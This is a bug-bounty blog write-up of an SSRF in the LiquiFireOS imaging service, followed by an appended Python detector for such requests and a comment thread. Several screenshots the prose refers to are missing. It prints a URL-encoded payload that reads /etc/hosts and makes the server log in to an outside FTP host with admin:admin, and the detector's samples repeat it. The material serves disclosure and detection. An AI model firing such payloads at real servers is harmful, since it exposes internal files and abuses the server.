During one bug bounty I found that the target web app was presenting some 'interesting errors' in its responses. ;) As this is always a nice hint to see during pentests/CTFs, I decided to dig a little more. Below you will find the details of the SSRF I found in LiquiFireOS. Here we go...
Today we'll start here:
This solution was 'something new' for me. An example response I found online during the bug bounty:
I decided to use Burp Suite and try a few of the scenarios described in one of the posts available on the blog:
A few more cases (and a sample response):
So it looks like we're talking about version 4.8.0 :) Cool, next:
As you can see (example requests from Intruder), there is an interesting part of the link, for example the url parameter.
I decided to try some other 'url' values :) Results below:
That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I'll try changing both of them:
That's nice :) Is there any other parameter available for this kind of modification?
To verify this I decided to read a very nice book for Christmas, called the manual: ;)
You can find a few more cool cases and examples there.
As I saw in one of the error messages, there are only four schemes available: http://, ftp://, file:// and cms://. I decided to use http and ftp:
Nice response. ;)
I decided to check whether the target app would be able to do something else for me, for example log in to some (internal? ;)) FTP server. Because I do not have one (in the 'target/bug bounty company' ;)) I decided to use a nice-for-cats FTP server I found online. Let's try to log in with admin:admin credentials:
Looks promising ;)
If you look at the main page ('of the target'), you should see something like this:
Sample payload to use in your URL:
"%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]"
Maybe you'll find it useful.
See you next time!
Cheers
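As an added defender-side example (not code from the original post or from the vendor), here is a small Python detector that unwinds the URL-encoding of requests shaped like the payload above and flags the properties the post points at: a non-http scheme inside url[...], embedded credentials, a host outside an allowlist or pointing at an internal address, and an absolute filesystem path inside source[...]. The allowlist and the sample request lines are constructed assumptions.

```python
import re
import ipaddress
from urllib.parse import unquote, urlsplit

# Hypothetical allowlist: the only origin the imaging endpoint should fetch from.
ALLOWED_HOSTS = {"images.example.com"}

# The call=url[...] and set=source[...] fragments seen in the post's payload.
URL_RE = re.compile(r"url\[([^\]]*)\]")
SOURCE_RE = re.compile(r"source\[([^\]]*)\]")

def _internal_host(host):
    """True for loopback/private/link-local IPs or obvious local names."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return host == "localhost" or host.endswith(".local")

def analyze_request(raw):
    """Return a list of findings for one request line (path plus query)."""
    decoded = raw
    for _ in range(3):  # unwind single or double percent-encoding until stable
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    findings = []
    for target in URL_RE.findall(decoded):
        parts = urlsplit(target)
        if parts.scheme not in ("http", "https"):
            findings.append(f"non-http scheme: {parts.scheme}")
        if parts.username or parts.password:
            findings.append("credentials embedded in url[]")
        host = parts.hostname or ""
        if host and host not in ALLOWED_HOSTS:
            findings.append(f"host outside allowlist: {host}")
        if host and _internal_host(host):
            findings.append(f"internal address: {host}")
    for src in SOURCE_RE.findall(decoded):
        if src.startswith("/"):
            findings.append(f"absolute filesystem path in source[]: {src}")
    return findings

# Constructed sample request lines: one benign fetch, one shaped like the post's
# payload (ftp with credentials plus /etc paths), and one aimed at loopback.
SAMPLE_REQUESTS = [
    "/%3Fset%3Dsource[logo.png]%26call%3Durl[http:%2f%2fimages.example.com/logo.png]",
    "/%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%26call%3Durl[ftp:%2f%2fadmin:admin@external-host.example/]",
    "/?set=source[x]&call=url[http://127.0.0.1:8080/]",
]
```

Run analyze_request over each line of SAMPLE_REQUESTS; the first yields no findings, the second four, the third two.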
hi,
do you still have the user manual of liquidfire os? i can't find it anywhere. need it for a security bug.
hi, unfortunately - no. but I believe you'll find some hints and answers at their webpage: knowledge,liquidpixels,com. hope that helps. :)
thanks for watching ;)
cheers
Hey, I escalated this to critical. I only reported it to one program, I could not find a lot of websites running this.
I found many webpages with this error but I need more payloads.
Cool. I believe you already informed the author(s) ;) so now is probably a good time to talk directly with the vendor about the exploitation scenarios and your other ideas.
I can help only with legal projects/research.
Thanks for watching.
Cheers
Any resources regarding escalation to Critical ?
Hi,
thanks for watching. I appreciate it. ;)
Answering: I did not dig deeper for this bug.
It is probably a good idea to check and/or ask the vendor directly: https;// iquidpixels, com
Cheers